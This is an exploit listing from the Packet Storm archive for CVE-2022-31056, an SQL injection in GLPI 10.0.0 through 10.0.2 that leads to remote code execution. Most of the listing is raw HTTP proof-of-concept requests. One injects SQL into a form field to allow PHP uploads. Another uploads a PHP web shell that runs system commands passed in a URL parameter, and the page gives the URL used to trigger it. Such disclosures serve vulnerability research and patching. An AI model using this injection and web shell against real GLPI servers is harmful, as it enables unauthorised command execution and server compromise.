what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GLPI 10.0.2 SQL Injection / Remote Code Execution

GLPI 10.0.2 SQL Injection / Remote Code Execution
Posted Apr 3, 2023
Authored by Nuri Cilengir

GLPI versions 10.0.0 through 10.0.2 suffer from a remote SQL injection vulnerability that can lead to remote code execution.

tags | exploit, remote, code execution, sql injection
advisories | CVE-2022-31056
SHA-256 | 153ed5c22caa3b6236e34c3a5e5f161d17ed9a98751c255527cfe3ab330beddb

GLPI 10.0.2 SQL Injection / Remote Code Execution

Change Mirror Download
# ADVISORY INFORMATION
# Exploit Title: GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)
# Date of found: 11 Jun 2022
# Application: GLPI >=10.0.0, < 10.0.3
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31056

# PoC
POST /front/change.form.php HTTP/1.1
Host: acme.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156
Content-Length: 4836
Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQ
n53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg

-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="id"
0
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="_glpi_csrf_token"
752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35

-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="_actors"
{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]}

-----------------------------190705055020145329172298897156--


If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows.

POST /ajax/fileupload.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841
Content-Length: 559
Origin: https://acme.com
Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg

-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="name"

_uploader_filename
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="showfilesize"

1
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php"
Content-Type: application/x-php

Output:
<?php echo system($_GET['cmd']); ?>
-----------------------------102822935214007887302871396841--

# POC URL
https://192.168.56.113/files/_tmp/poc.php?cmd=


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close